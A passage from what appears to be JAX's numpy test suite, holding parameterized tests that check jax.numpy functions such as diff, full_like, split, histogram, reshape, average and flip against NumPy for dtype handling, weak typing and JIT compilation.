elif not np.isscalar(prepend) and prepend.dtype == jnp.bfloat16:
prepend = prepend.astype(np.float32)
if append is None:
append = np._NoValue
elif not np.isscalar(append) and append.dtype == jnp.bfloat16:
append = append.astype(np.float32)
if x.dtype == jnp.bfloat16:
return np.diff(x.astype(np.float32), n=n, axis=axis, prepend=prepend, append=append).astype(jnp.bfloat16)
else:
return np.diff(x, n=n, axis=axis, prepend=prepend, append=append)
jnp_fun = lambda x: jnp.diff(x, n=n, axis=axis, prepend=prepend, append=append)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": ("_op={}_shape={}_dtype={}").format(op, shape, dtype),
"np_op": getattr(np, op), "jnp_op": getattr(jnp, op),
"shape": shape, "dtype": dtype}
for op in ["zeros", "ones"]
for shape in [2, (), (2,), (3, 0), np.array((4, 5, 6), dtype=np.int32),
np.array(4, dtype=np.int32)]
for dtype in all_dtypes))
def testZerosOnes(self, np_op, jnp_op, shape, dtype):
args_maker = lambda: []
np_op = partial(np_op, shape, dtype)
jnp_op = partial(jnp_op, shape, dtype)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
def testOnesWithInvalidShape(self):
with self.assertRaises(TypeError):
jnp.ones((-1, 1))
@parameterized.named_parameters(jtu.named_cases_from_sampler(lambda s: ({
"testcase_name": "_inshape={}_filldtype={}_fillshape={}_outdtype={}_outshape={}".format(
jtu.format_shape_dtype_string(shape, in_dtype),
np.dtype(fill_value_dtype).name, fill_value_shape,
np.dtype(out_dtype).name, out_shape),
"shape": shape, "in_dtype": in_dtype,
"fill_value_dtype": fill_value_dtype, "fill_value_shape": fill_value_shape,
"out_dtype": out_dtype, "out_shape": out_shape
} for shape in s(array_shapes)
for out_shape in s([None] + array_shapes)
for in_dtype in s(default_dtypes)
for fill_value_dtype in s(default_dtypes)
for fill_value_shape in s(_compatible_shapes(shape if out_shape is None else out_shape))
for out_dtype in s(default_dtypes))))
def testFullLike(self, shape, in_dtype, fill_value_dtype, fill_value_shape, out_dtype, out_shape):
if numpy_version < (1, 19) and out_shape == ():
raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
rng = jtu.rand_default(self.rng())
np_fun = lambda x, fill_value: np.full_like(
x, fill_value, dtype=out_dtype, shape=out_shape)
jnp_fun = lambda x, fill_value: jnp.full_like(
x, fill_value, dtype=out_dtype, shape=out_shape)
args_maker = lambda: [rng(shape, in_dtype), rng(fill_value_shape, fill_value_dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_func={}_inshape={}_outshape={}_outdtype={}".format(
func, jtu.format_shape_dtype_string(shape, in_dtype),
out_shape, out_dtype),
"func": func, "shape": shape, "in_dtype": in_dtype,
"out_shape": out_shape, "out_dtype": out_dtype}
for shape in array_shapes
for out_shape in [None] + array_shapes
for in_dtype in default_dtypes
for func in ["ones_like", "zeros_like"]
for out_dtype in default_dtypes))
def testZerosOnesLike(self, func, shape, in_dtype, out_shape, out_dtype):
if numpy_version < (1, 19) and out_shape == ():
raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
rng = jtu.rand_default(self.rng())
np_fun = lambda x: getattr(np, func)(x, dtype=out_dtype, shape=out_shape)
jnp_fun = lambda x: getattr(jnp, func)(x, dtype=out_dtype, shape=out_shape)
args_maker = lambda: [rng(shape, in_dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_func={}_inshape={}_weak_type={}_outshape={}_outdtype={}".format(
func, jtu.format_shape_dtype_string(shape, in_dtype),
weak_type, out_shape, out_dtype),
"func": func, "args": args,
"shape": shape, "in_dtype": in_dtype, "weak_type": weak_type,
"out_shape": out_shape, "out_dtype": out_dtype}
for shape in array_shapes
for in_dtype in [np.int32, np.float32, np.complex64]
for weak_type in [True, False]
for out_shape in [None, (), (10,)]
for func, args in [("full_like", (-100,)), ("ones_like", ()), ("zeros_like", ())]
for out_dtype in [None, float]))
def testZerosOnesFullLikeWeakType(self, func, args, shape, in_dtype, weak_type, out_shape, out_dtype):
if numpy_version < (1, 19) and out_shape == ():
raise SkipTest("Numpy < 1.19 treats out_shape=() like out_shape=None")
rng = jtu.rand_default(self.rng())
x = lax._convert_element_type(rng(shape, in_dtype), weak_type=weak_type)
fun = lambda x: getattr(jnp, func)(x, *args, dtype=out_dtype, shape=out_shape)
expected_weak_type = weak_type and (out_dtype is None)
self.assertEqual(dtypes.is_weakly_typed(fun(x)), expected_weak_type)
self.assertEqual(dtypes.is_weakly_typed(api.jit(fun)(x)), expected_weak_type)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_funcname={}_input_type={}_val={}_dtype={}".format(
funcname, input_type, val, dtype),
"funcname": funcname, "input_type": input_type, "val": val, "dtype": dtype}
for funcname in ["array", "asarray"]
for dtype in [int, float, None]
for val in [0, 1]
for input_type in [int, float, np.int32, np.float32]))
def testArrayWeakType(self, funcname, input_type, val, dtype):
func = lambda x: getattr(jnp, funcname)(x, dtype=dtype)
fjit = api.jit(func)
val = input_type(val)
expected_weak_type = dtype is None and input_type in set(dtypes._weak_types)
self.assertEqual(dtypes.is_weakly_typed(func(val)), expected_weak_type)
self.assertEqual(dtypes.is_weakly_typed(fjit(val)), expected_weak_type)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_weak_type={}_slc={}".format(
jtu.format_shape_dtype_string(shape, dtype), weak_type, slc),
"shape": shape, "dtype": dtype, "weak_type": weak_type, "slc": slc}
for shape in nonempty_nonscalar_array_shapes
for dtype in [int, float, complex]
for weak_type in [True, False]
for slc in [slice(None), slice(0), slice(3), 0, ...]))
def testSliceWeakTypes(self, shape, dtype, weak_type, slc):
rng = jtu.rand_default(self.rng())
x = lax._convert_element_type(rng(shape, dtype), weak_type=weak_type)
op = lambda x: x[slc]
self.assertEqual(op(x).aval.weak_type, weak_type)
self.assertEqual(api.jit(op)(x).aval.weak_type, weak_type)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_{}sections".format(
jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
"shape": shape, "num_sections": num_sections, "axis": axis,
"dtype": dtype}
for shape, axis, num_sections in [
((3,), 0, 3), ((12,), 0, 3), ((12, 4), 0, 4), ((12, 4), 1, 2),
((2, 3, 4), -1, 2), ((2, 3, 4), -2, 3)]
for dtype in default_dtypes))
def testSplitStaticInt(self, shape, num_sections, axis, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.split(x, num_sections, axis=axis)
jnp_fun = lambda x: jnp.split(x, num_sections, axis=axis)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_{}sections".format(
jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
"shape": shape, "num_sections": num_sections, "axis": axis, "dtype": dtype}
# All testcases split the specified axis unequally
for shape, axis, num_sections in [
((3,), 0, 2), ((12,), 0, 5), ((12, 4), 0, 7), ((12, 4), 1, 3),
((2, 3, 5), -1, 2), ((2, 4, 4), -2, 3), ((7, 2, 2), 0, 3)]
for dtype in default_dtypes))
def testArraySplitStaticInt(self, shape, num_sections, axis, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.array_split(x, num_sections, axis=axis)
jnp_fun = lambda x: jnp.array_split(x, num_sections, axis=axis)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testSplitTypeError(self):
# If we pass an ndarray for indices_or_sections -> no error
self.assertEqual(3, len(jnp.split(jnp.zeros(3), jnp.array([1, 2]))))
CONCRETIZATION_MSG = "Abstract tracer value encountered where concrete value is expected."
with self.assertRaisesRegex(TypeError, CONCRETIZATION_MSG):
# An abstract tracer for idx
api.jit(lambda idx: jnp.split(jnp.zeros((12, 2)), idx))(2.)
with self.assertRaisesRegex(TypeError, CONCRETIZATION_MSG):
# A list including an abstract tracer
api.jit(lambda idx: jnp.split(jnp.zeros((12, 2)), [2, idx]))(2.)
# A concrete tracer -> no error
api.jvp(lambda idx: jnp.split(jnp.zeros((12, 2)), idx),
(2.,), (1.,))
# A tuple including a concrete tracer -> no error
api.jvp(lambda idx: jnp.split(jnp.zeros((12, 2)), (1, idx)),
(2.,), (1.,))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_bins={}_range={}_weights={}".format(
jtu.format_shape_dtype_string(shape, dtype), bins, range, weights),
"shape": shape,
"dtype": dtype,
"bins": bins,
"range": range,
"weights": weights,
}
for shape in [(5,), (5, 5)]
for dtype in number_dtypes
for bins in [10, np.arange(-5, 6), [-5, 0, 3]]
for range in [None, (0, 0), (0, 10)]
for weights in [True, False]
))
def testHistogramBinEdges(self, shape, dtype, bins, range, weights):
rng = jtu.rand_default(self.rng())
_weights = lambda w: abs(w) if weights else None
np_fun = lambda a, w, r: np.histogram_bin_edges(a, bins=bins, range=r,
weights=_weights(w))
jnp_fun = lambda a, w, r: jnp.histogram_bin_edges(a, bins=bins, range=r,
weights=_weights(w))
args_maker = lambda: [rng(shape, dtype), rng(shape, dtype), range]
tol = {jnp.bfloat16: 2E-2, np.float16: 1E-2}
# linspace() compares poorly to numpy when using bfloat16
if dtype != jnp.bfloat16:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False, tol=tol)
self._CompileAndCheck(jnp_fun, args_maker,
atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_bins={}_density={}_weights={}".format(
jtu.format_shape_dtype_string(shape, dtype), bins, density, weights),
"shape": shape,
"dtype": dtype,
"bins": bins,
"density": density,
"weights": weights,
}
for shape in [(5,), (5, 5)]
for dtype in default_dtypes
# We only test explicit integer-valued bin edges because in other cases
# rounding errors lead to flaky tests.
for bins in [np.arange(-5, 6), [-5, 0, 3]]
for density in [True, False]
for weights in [True, False]
))
def testHistogram(self, shape, dtype, bins, density, weights):
rng = jtu.rand_default(self.rng())
_weights = lambda w: abs(w) if weights else None
np_fun = lambda a, w: np.histogram(a, bins=bins, density=density,
weights=_weights(w))
jnp_fun = lambda a, w: jnp.histogram(a, bins=bins, density=density,
weights=_weights(w))
args_maker = lambda: [rng(shape, dtype), rng(shape, dtype)]
tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
# np.searchsorted errors on bfloat16 with
# "TypeError: invalid type promotion with custom data type"
if dtype != jnp.bfloat16:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_bins={}_weights={}_density={}".format(
jtu.format_shape_dtype_string(shape, dtype), bins, weights, density),
"shape": shape,
"dtype": dtype,
"bins": bins,
"weights": weights,
"density": density
}
for shape in [(5,), (12,)]
for dtype in int_dtypes
for bins in [2, [2, 2], [[0, 1, 3, 5], [0, 2, 3, 4, 6]]]
for weights in [False, True]
for density in [False, True]
))
def testHistogram2d(self, shape, dtype, bins, weights, density):
rng = jtu.rand_default(self.rng())
_weights = lambda w: abs(w) if weights else None
np_fun = lambda a, b, w: np.histogram2d(a, b, bins=bins, weights=_weights(w), density=density)
jnp_fun = lambda a, b, w: jnp.histogram2d(a, b, bins=bins, weights=_weights(w), density=density)
args_maker = lambda: [rng(shape, dtype), rng(shape, dtype), rng(shape, dtype)]
tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
# np.searchsorted errors on bfloat16 with
# "TypeError: invalid type promotion with custom data type"
with np.errstate(divide='ignore', invalid='ignore'):
if dtype != jnp.bfloat16:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_bins={}_weights={}_density={}".format(
jtu.format_shape_dtype_string(shape, dtype), bins, weights, density),
"shape": shape,
"dtype": dtype,
"bins": bins,
"weights": weights,
"density": density
}
for shape in [(5, 3), (10, 3)]
for dtype in int_dtypes
for bins in [(2, 2, 2), [[-5, 0, 4], [-4, -1, 2], [-6, -1, 4]]]
for weights in [False, True]
for density in [False, True]
))
def testHistogramdd(self, shape, dtype, bins, weights, density):
rng = jtu.rand_default(self.rng())
_weights = lambda w: abs(w) if weights else None
np_fun = lambda a, w: np.histogramdd(a, bins=bins, weights=_weights(w), density=density)
jnp_fun = lambda a, w: jnp.histogramdd(a, bins=bins, weights=_weights(w), density=density)
args_maker = lambda: [rng(shape, dtype), rng((shape[0],), dtype)]
tol = {jnp.bfloat16: 2E-2, np.float16: 1E-1}
# np.searchsorted errors on bfloat16 with
# "TypeError: invalid type promotion with custom data type"
if dtype != jnp.bfloat16:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}_{}sections".format(
jtu.format_shape_dtype_string(shape, dtype), axis, num_sections),
"shape": shape, "num_sections": num_sections, "axis": axis,
"dtype": dtype}
for shape, axis, num_sections in [
((12, 4), 0, 4), ((12, 4), 1, 2),
((2, 3, 4), 2, 2), ((4, 3, 4), 0, 2)]
for dtype in default_dtypes))
def testHVDSplit(self, shape, num_sections, axis, dtype):
rng = jtu.rand_default(self.rng())
def fn(module, axis):
if axis == 0:
return module.vsplit
elif axis == 1:
return module.hsplit
else:
assert axis == 2
return module.dsplit
np_fun = lambda x: fn(np, axis)(x, num_sections)
jnp_fun = lambda x: fn(jnp, axis)(x, num_sections)
args_maker = lambda: [rng(shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_outshape={}_order={}".format(
jtu.format_shape_dtype_string(arg_shape, dtype),
jtu.format_shape_dtype_string(out_shape, dtype),
order),
"arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype,
"order": order}
for dtype in default_dtypes
for order in ["C", "F"]
for arg_shape, out_shape in [
(jtu.NUMPY_SCALAR_SHAPE, (1, 1, 1)),
((), (1, 1, 1)),
((7, 0), (0, 42, 101)),
((3, 4), 12),
((3, 4), (12,)),
((3, 4), -1),
((2, 1, 4), (-1,)),
((2, 2, 4), (2, 8))
]))
def testReshape(self, arg_shape, out_shape, dtype, order):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.reshape(x, out_shape, order=order)
jnp_fun = lambda x: jnp.reshape(x, out_shape, order=order)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_outshape={}".format(
jtu.format_shape_dtype_string(arg_shape, dtype),
jtu.format_shape_dtype_string(out_shape, dtype)),
"arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype}
for dtype in default_dtypes
for arg_shape, out_shape in [
((7, 0), (0, 42, 101)),
((2, 1, 4), (-1,)),
((2, 2, 4), (2, 8))
]))
def testReshapeMethod(self, arg_shape, out_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.reshape(x, out_shape)
jnp_fun = lambda x: x.reshape(*out_shape)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_outshape={}".format(
jtu.format_shape_dtype_string(arg_shape, dtype),
jtu.format_shape_dtype_string(out_shape, dtype)),
"arg_shape": arg_shape, "out_shape": out_shape, "dtype": dtype}
for dtype in default_dtypes
for arg_shape, out_shape in itertools.product(all_shapes, array_shapes)))
def testResize(self, arg_shape, out_shape, dtype):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.resize(x, out_shape)
jnp_fun = lambda x: jnp.resize(x, out_shape)
args_maker = lambda: [rng(arg_shape, dtype)]
if len(out_shape) > 0 or numpy_version >= (1, 20, 0):
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_expanddim={!r}".format(
jtu.format_shape_dtype_string(arg_shape, dtype), dim),
"arg_shape": arg_shape, "dtype": dtype, "dim": dim}
for arg_shape in [(), (3,), (3, 4)]
for dtype in default_dtypes
for dim in (list(range(-len(arg_shape)+1, len(arg_shape)))
+ [np.array(0), np.array(-1), (0,), [np.array(0)],
(len(arg_shape), len(arg_shape) + 1)])))
def testExpandDimsStaticDim(self, arg_shape, dtype, dim):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.expand_dims(x, dim)
jnp_fun = lambda x: jnp.expand_dims(x, dim)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CompileAndCheck(jnp_fun, args_maker)
if isinstance(dim, (tuple, list)) and numpy_version < (1, 18, 0):
raise SkipTest("support for multiple axes added in NumPy 1.18.0")
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_axes=({},{})".format(
jtu.format_shape_dtype_string(arg_shape, dtype), ax1, ax2),
"arg_shape": arg_shape, "dtype": dtype, "ax1": ax1, "ax2": ax2}
for arg_shape, ax1, ax2 in [
((3, 4), 0, 1), ((3, 4), 1, 0), ((3, 4, 5), 1, 2),
((3, 4, 5), -1, -2), ((3, 4, 5), 0, 1)]
for dtype in default_dtypes))
def testSwapAxesStaticAxes(self, arg_shape, dtype, ax1, ax2):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.swapaxes(x, ax1, ax2)
jnp_fun = lambda x: jnp.swapaxes(x, ax1, ax2)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_inshape={}_axis={!r}".format(
jtu.format_shape_dtype_string(arg_shape, dtype), ax),
"arg_shape": arg_shape, "dtype": dtype, "ax": ax}
for arg_shape, ax in [
((3, 1), None),
((3, 1), 1),
((3, 1), -1),
((3, 1), np.array(1)),
((1, 3, 1), (0, 2)),
((1, 3, 1), (0,)),
((1, 4, 1), (np.array(0),))]
for dtype in default_dtypes))
def testSqueeze(self, arg_shape, dtype, ax):
rng = jtu.rand_default(self.rng())
np_fun = lambda x: np.squeeze(x, ax)
jnp_fun = lambda x: jnp.squeeze(x, ax)
args_maker = lambda: [rng(arg_shape, dtype)]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_shape={}_axis={}_weights={}_returned={}".format(
jtu.format_shape_dtype_string(shape, dtype),
axis,
(None if weights_shape is None else jtu.format_shape_dtype_string(weights_shape, dtype)),
returned),
"shape": shape, "dtype": dtype, "axis": axis,
"weights_shape": weights_shape, "returned": returned}
for shape, dtype in _shape_and_dtypes(nonempty_shapes, number_dtypes)
for axis in list(range(-len(shape), len(shape))) + [None]
# `weights_shape` is either `None`, same as the averaged axis, or same as
# that of the input
for weights_shape in ([None, shape] if axis is None or len(shape) == 1
else [None, (shape[axis],), shape])
for returned in [False, True]))
def testAverage(self, shape, dtype, axis, weights_shape, returned):
rng = jtu.rand_default(self.rng())
if weights_shape is None:
np_fun = lambda x: np.average(x, axis, returned=returned)
jnp_fun = lambda x: jnp.average(x, axis, returned=returned)
args_maker = lambda: [rng(shape, dtype)]
else:
np_fun = lambda x, weights: np.average(x, axis, weights, returned)
jnp_fun = lambda x, weights: jnp.average(x, axis, weights, returned)
args_maker = lambda: [rng(shape, dtype), rng(weights_shape, dtype)]
np_fun = _promote_like_jnp(np_fun, inexact=True)
tol = {dtypes.bfloat16: 2e-1, np.float16: 1e-2, np.float32: 1e-5,
np.float64: 1e-12, np.complex64: 1e-5}
check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
try:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=check_dtypes, tol=tol)
except ZeroDivisionError:
self.skipTest("don't support checking for ZeroDivisionError")
self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=check_dtypes,
rtol=tol, atol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name":
f"_arg{i}_ndmin={ndmin}_dtype={np.dtype(dtype) if dtype else None}",
"arg": arg, "ndmin": ndmin, "dtype": dtype}
for i, (arg, dtypes) in enumerate([
([True, False, True], all_dtypes),
(3., all_dtypes),
([1, 2, 3], all_dtypes),
(np.array([1, 2, 3], dtype=np.int64), all_dtypes),
([1., 2., 3.], all_dtypes),
([[1, 2], [3, 4], [5, 6]], all_dtypes),
([[1, 2.], [3, 4], [5, 6]], all_dtypes),
([[1., 2j], [3., 4.], [5., 6.]], complex_dtypes),
([[3, np.array(2, dtype=jnp.float_), 1],
np.arange(3., dtype=jnp.float_)], all_dtypes),
])
for dtype in [None] + dtypes
for ndmin in [None, np.ndim(arg), np.ndim(arg) + 1, np.ndim(arg) + 2]))
def testArray(self, arg, ndmin, dtype):
args_maker = lambda: [arg]
canonical_dtype = dtypes.canonicalize_dtype(dtype or np.array(arg).dtype)
if ndmin is not None:
np_fun = partial(np.array, ndmin=ndmin, dtype=canonical_dtype)
jnp_fun = partial(jnp.array, ndmin=ndmin, dtype=dtype)
else:
np_fun = partial(np.array, dtype=canonical_dtype)
jnp_fun = partial(jnp.array, dtype=dtype)
# We are testing correct canonicalization behavior here, so we turn off the
# permissive canonicalization logic in the test harness.
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
canonicalize_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
def testArrayUnsupportedDtypeError(self):
with self.assertRaisesRegex(TypeError,
"JAX only supports number and bool dtypes.*"):
jnp.array(3, [('a','<i4'),('b','<i4')])
def testArrayFromInteger(self):
int_dtype = dtypes.canonicalize_dtype(jnp.int64)
int_max = jnp.iinfo(int_dtype).max
int_min = jnp.iinfo(int_dtype).min
# Values at extremes are converted correctly.
for val in [int_min, 0, int_max]:
self.assertEqual(jnp.array(val).dtype, int_dtype)
# out of bounds leads to an OverflowError
val = int_max + 1
with self.assertRaisesRegex(OverflowError, f"Python int {val} too large to convert to {int_dtype.name}"):
jnp.array(val)
# explicit uint64 should work
if config.x64_enabled:
self.assertEqual(np.uint64(val), jnp.array(val, dtype='uint64'))
# TODO(jakevdp): fix list inputs to jnp.array and enable the following test
# def testArrayFromList(self):
# int_max = jnp.iinfo(jnp.int64).max
# int_min = jnp.iinfo(jnp.int64).min
#
# # Values at extremes are converted correctly.
# for val in [int_min, 0, int_max]:
# self.assertEqual(jnp.array([val]).dtype, dtypes.canonicalize_dtype('int64'))
#
# # list of values results in promoted type.
# self.assertEqual(jnp.array([0, np.float16(1)]).dtype, jnp.result_type('int64', 'float16'))
#
# # out of bounds leads to an OverflowError
# val = int_min - 1
# with self.assertRaisesRegex(OverflowError, f"Python int {val} too large to convert to int64"):
# jnp.array([0, val])
def testIssue121(self):
assert not np.isscalar(jnp.array(3))
def testArrayOutputsDeviceArrays(self):
assert xla.type_is_device_array(jnp.array([]))
assert xla.type_is_device_array(jnp.array(np.array([])))
class NDArrayLike:
def __array__(self, dtype=None):
return np.array([], dtype=dtype)
assert xla.type_is_device_array(jnp.array(NDArrayLike()))
# NOTE(mattjj): disabled b/c __array__ must produce ndarrays
# class DeviceArrayLike:
# def __array__(self, dtype=None):
# return jnp.array([], dtype=dtype)
# assert xla.type_is_device_array(jnp.array(DeviceArrayLike()))
def testArrayMethod(self):
class arraylike(object):
dtype = np.float32
def __array__(self, dtype=None):
return np.array(3., dtype=dtype)
a = arraylike()
ans = jnp.array(a)
assert ans == 3.
def testMemoryView(self):
ans = jnp.array(bytearray(b'\x2a'))
self.assertAllClose(
ans,
np.array([0x2a], dtype=np.uint8))
def testIsClose(self):
c_isclose = api.jit(jnp.isclose)
c_isclose_nan = api.jit(partial(jnp.isclose, equal_nan=True))
n = 2
rng = np.random.RandomState(0)
x = rng.randn(n, 1)
y = rng.randn(n, 1)
inf = np.asarray(n * [np.inf]).reshape([n, 1])
nan = np.asarray(n * [np.nan]).reshape([n, 1])
args = [x, y, inf, -inf, nan]
for arg0 in args:
for arg1 in args:
result_np = np.isclose(arg0, arg1)
result_jax = jnp.isclose(arg0, arg1)
result_jit = c_isclose(arg0, arg1)
self.assertTrue(jnp.all(jnp.equal(result_np, result_jax)))
self.assertTrue(jnp.all(jnp.equal(result_np, result_jit)))
result_np = np.isclose(arg0, arg1, equal_nan=True)
result_jax = jnp.isclose(arg0, arg1, equal_nan=True)
result_jit = c_isclose_nan(arg0, arg1)
self.assertTrue(jnp.all(jnp.equal(result_np, result_jax)))
self.assertTrue(jnp.all(jnp.equal(result_np, result_jit)))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_x={}_y={}_equal_nan={}".format(x, y, equal_nan),
"x": x, "y": y, "equal_nan": equal_nan}
for x, y in itertools.product([
1, [1], [1, 1 + 1E-4], [1, np.nan]], repeat=2)
for equal_nan in [True, False]))
def testAllClose(self, x, y, equal_nan):
jnp_fun = partial(jnp.allclose, equal_nan=equal_nan, rtol=1E-3)
np_fun = partial(np.allclose, equal_nan=equal_nan, rtol=1E-3)
args_maker = lambda: [x, y]
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testZeroStridesConstantHandler(self):
raw_const = np.random.RandomState(0).randn(1, 2, 1, 1, 5, 1)
const = np.broadcast_to(raw_const, (3, 2, 3, 4, 5, 6))
def fun(x):
return x * const
fun = api.jit(fun)
out_val = fun(3.)
self.assertAllClose(out_val, 3. * const, check_dtypes=False)
def testIsInstanceNdarrayDuringTracing(self):
arr = np.ones(3)
@api.jit
def f(x):
self.assertIsInstance(x, jnp.ndarray)
return jnp.sum(x)
f(arr)
def testNonArrayErrorMessage(self):
x = [1., 2.]
y = np.array([3., 4.])
def g(x, y):
return jnp.add(x, y)
def f(x, y):
return jnp.dot(x, y)
self.assertRaises(TypeError, lambda: g(x, y))
self.assertRaises(TypeError, lambda: f(x, y))
self.assertRaises(TypeError, lambda: api.jit(g)(x, y))
self.assertRaises(TypeError, lambda: api.jit(f)(x, y))
def testAbstractionErrorMessage(self):
@api.jit
def f(x, n):
for _ in range(n):
x = x * x
return x
self.assertRaises(jax.errors.TracerIntegerConversionError, lambda: f(3., 3))
@api.jit
def g(x):
if x > 0.:
return x * 2
else:
return x + 2
self.assertRaises(jax.errors.ConcretizationTypeError, lambda: g(3.))
def testTracingPrimitiveWithNoTranslationErrorMessage(self):
# TODO(mattjj): update this for jax3
self.skipTest("test needs jax3 update")
foo = jnp._not_implemented(lambda x: x)
# No error if there's no tracing.
foo(np.arange(3))
cfoo = api.jit(foo)
self.assertRaises(NotImplementedError, lambda: cfoo(np.arange(3)))
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_axis={}".format(
jtu.format_shape_dtype_string(shape, dtype), axis),
"shape": shape, "dtype": dtype, "axis": axis}
for shape in [(3,), (2, 3)]
for dtype in default_dtypes
for axis in list(range(-len(shape), len(shape))) + [None] + [tuple(range(len(shape)))] # Test negative axes and tuples
))
def testFlip(self, shape, dtype, axis):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.flip(x, axis)
np_op = lambda x: np.flip(x, axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in [(3,), (2, 3), (3, 2, 4)]
for dtype in default_dtypes))
def testFlipud(self, shape, dtype):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.flipud(x)
np_op = lambda x: np.flipud(x)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}".format(
jtu.format_shape_dtype_string(shape, dtype)),
"shape": shape, "dtype": dtype}
for shape in [(3, 2), (2, 3), (3, 2, 4)]
for dtype in default_dtypes))
def testFliplr(self, shape, dtype):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_op = lambda x: jnp.fliplr(x)
np_op = lambda x: np.fliplr(x)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_k={}_axes={}".format(
jtu.format_shape_dtype_string(shape, dtype), k, axes),
